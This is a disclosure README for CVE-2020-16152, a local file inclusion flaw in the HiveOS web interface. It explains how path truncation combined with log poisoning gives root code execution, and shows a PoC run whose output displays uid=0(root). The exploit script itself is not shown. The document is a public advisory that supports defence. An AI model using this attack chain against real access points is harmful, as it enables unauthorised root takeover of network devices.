Explanation and PoC for CVE-2020-16152
# CVE-2020-16152
## Summary
| []() | |
| --------------- | ---------------------------------------- |
| Product vendor | Aerohive Networks / Extreme Networks |
| Product name | HiveOS / IQ Engine |
| Product Version | Tested on 10.0r8a build-242466 and older |
The Aerohive/Extreme Networks HiveOS administrative webinterface (_NetConfig_) is vulnerable to LFI because it uses an old version of PHP vulnerable to string truncation attacks. An attacker is able to use this in conjunction with log poisoning to gain _root_ rights on a vulnerable access point.
As a work-around it is possible to disable the web interface with the following command: `no system web-server hive-UI enable` to protect against this vulnerability.
## Disclosure timeline:
| []() | |
| --------------- | ---------------------------------------- |
| 2019/02/17 | Issue was reported to Aerohive Networks |
| 2019/02/19 | Acknowledgement issue was received by vendor, work around suggested by vendor (disable web interface) |
| 2019/02/25 | Confirmation of issue by vendor |
| 2019/03/18 | Ping? |
| 2019/05/30 | Ping? |
| 2019/06/03 | Vendor suggests a phonecall, replied with phone details. No call was received |
| 2019/08/12 | Ping? Vendor replied issue is escalated internally |
| 2019/09/23 | Ping? |
| 2019/09/25 | Vendor replies the LFI issue has not been addressed yet |
| 2020/07/30 | Found issue is still not fixed in HiveOS 10.0r8a build-242466 which dates from 05/2020. Reserved CVE and communicated 2020/09/01 deadline for publication unless a fix is actively being worked on |
| 2020/09/01 | Still no reply from vendor, release of details and PoC |
## Details
The `_page` parameter used for calls to `action/AhBaseAction.class.php5` as referenced by url `/action.php5` is used to dynamically load a PHP class that is used for a page as we can see in the code snippet below (`$pageName` is taken from `$_POST['_page']`):
protected function getAccess($pageName,$actionType) {
$filename = $pageName.'Access.class.php5';
$classname = $pageName.'Access';
if (include_once $filename) {
require_once $filename;
return new $classname($this->user,$actionType);
As we can see there is no prefix for this filename making is possible to traverse path to arbitrary files. However because we're presented with a suffix it's not possible to include just any file. Since the version of PHP on the access point is quite old, we can actually work around this ([more info)](https://www.ush.it/2009/02/08/php-filesystem-attack-vectors/):
$ php-cgi -v
PHP Warning: PHP Startup: Cannot dynamically load sockets.so - dynamic modules are not supported in Unknown on line 0
PHP 5.2.17 (cgi-fcgi) (built: May 28 2020 23:36:34)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies
By filling the path with enough `/` characters we can make sure the `Access.class.php5` suffix is completely truncated and are free to include arbitrary files.
Because failed login attempts are logged to `/tmp/messages` and include the submitted username we can use the login page to poison `/tmp/messages` and then run code from it with the LFI attack listed above.
Although the webserver itself is running a low privileged user the `php-cgi` instance used by `hiawatha` is actually running as _root_ which means all php code is executed as root:
$ ps | egrep "php|hiawatha"
2237 root 9980 S /usr/local/bin/php-cgi -b
12088 admin 20840 S /usr/local/sbin/hiawatha
## PoC
$ ./CVE-2020-16152.py 'echo -e "\n\n";id' | tail
2020-08-30 13:56:28 notice root: ntpclient: [ntpclient]Set time - Sun Aug 30 13:56:28 GMT+1:00 2020
2020-08-30 13:56:28 notice root: Connect [0.aerohive.pool.ntp.org] successful
2020-08-30 13:56:54 info ah_dcd: application: get track-ip trigger access console request: cancel.
2020-08-30 13:57:00 notice root: ntpclient: [ntpclient]Set time - Sun Aug 30 13:57:00 GMT+1:00 2020
2020-08-30 13:57:00 notice root: Connect [0.aerohive.pool.ntp.org] successful
2020-08-30 13:57:31 notice ah_webui: security: Admin "<
uid=0(root) gid=0(root)
[4.0K] /data/pocs/3b9aa56c959f7a901d63ce86483801407fbe79eb
├── [ 729] CVE-2020-16152.py
├── [ 34K] LICENSE
└── [4.2K] README.md
0 directories, 3 files
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